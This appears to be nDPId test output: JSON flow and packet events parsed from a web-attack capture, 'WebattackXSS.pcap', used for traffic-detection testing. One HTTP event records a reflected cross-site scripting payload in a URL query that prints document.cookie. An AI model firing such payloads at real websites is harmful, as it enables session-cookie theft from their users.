-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ49weXgmaGoUGtaAScSAkLAAAAgQFtAQCCAoD5O1XATsb4gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":3,"flow_last_seen":1499347545177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347545177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HVdAAD4GqIGsEAABwKgKMuPcAFAahQa1Hl4Jm4AQAOXDMwAAAQEICgE7G+ID5O1X"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347546427,"flow_last_seen":1499347546427,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1499347546427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q6tAAD4GgiWsEAABwKgKMuPqAFBqhV6wAAAAAKACchCTPQAAAgQFtAQCCAoBOx0bAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4828,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":2,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546428,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4+qNxgXIaoVesaAScSAOGQAAAgQFtAQCCAoD5O6QATsdGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":3,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347546428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q6xAAD4GgiysEAABwKgKMuPqAFBqhV6xjcYFyYAQAOWtIAAAAQEICgE7HRsD5O6Q"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347422332,"flow_last_seen":1499347427732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347423604,"flow_last_seen":1499347428732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":3,"flow_last_seen":1499347547688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347547688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09IpAAD4G0U2sEAABwKgKMuP4AFDYf+rgEbVhN4AQAOXRFQAAAQEICgE7HlYD5O\/L"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347550209,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347550209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eyFAAD4GSq+sEAABwKgKMuQSAFDq3lvtAAAAAKACchARzgAAAgQFtAQCCAoBOyDMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":2,"flow_last_seen":1499347550209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5BLEGGHa6t5b7qAScSD2kwAAAgQFtAQCCAoD5PJBATsgzAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4859,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":3,"flow_last_seen":1499347550210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347550210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eyJAAD4GSrasEAABwKgKMuQSAFDq3lvuxBhh24AQAOWVmwAAAQEICgE7IMwD5PJB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347551495,"flow_last_seen":1499347551495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347551495,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":1499347552737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347552737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0B95AAD4GvfqsEAABwKgKMuQuAFCEqySasT6GM4AQAOUcmQAAAQEICgE7I0QD5PS5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347555255,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347555255,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81HxAAD4G8VOsEAABwKgKMuRIAFCgOPHGAAAAAKACchDBdgAAAgQFtAQCCAoBOyW6AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":1499347555255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5EiyOWdGoDjxx6AScSCtwQAAAgQFtAQCCAoD5PcvATslugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":3,"flow_last_seen":1499347555256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347555256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01H1AAD4G8VqsEAABwKgKMuRIAFCgOPHHsjlnR4AQAOVMyQAAAQEICgE7JboD5Pcv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347556523,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89uZAAD4GzumsEAABwKgKMuRWAFDF1NARAAAAAKACchC8RAAAAgQFtAQCCAoBOyb3AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":2,"flow_last_seen":1499347556523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347556523,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5FYT\/QypxdTQEqAScSCgLAAAAgQFtAQCCAoD5PhsATsm9wEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":3,"flow_last_seen":1499347556524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347556524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09udAAD4GzvCsEAABwKgKMuRWAFDF1NASE\/0MqoAQAOU\/NAAAAQEICgE7JvcD5Phs"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347426122,"flow_last_seen":1499347431733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347427366,"flow_last_seen":1499347432733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
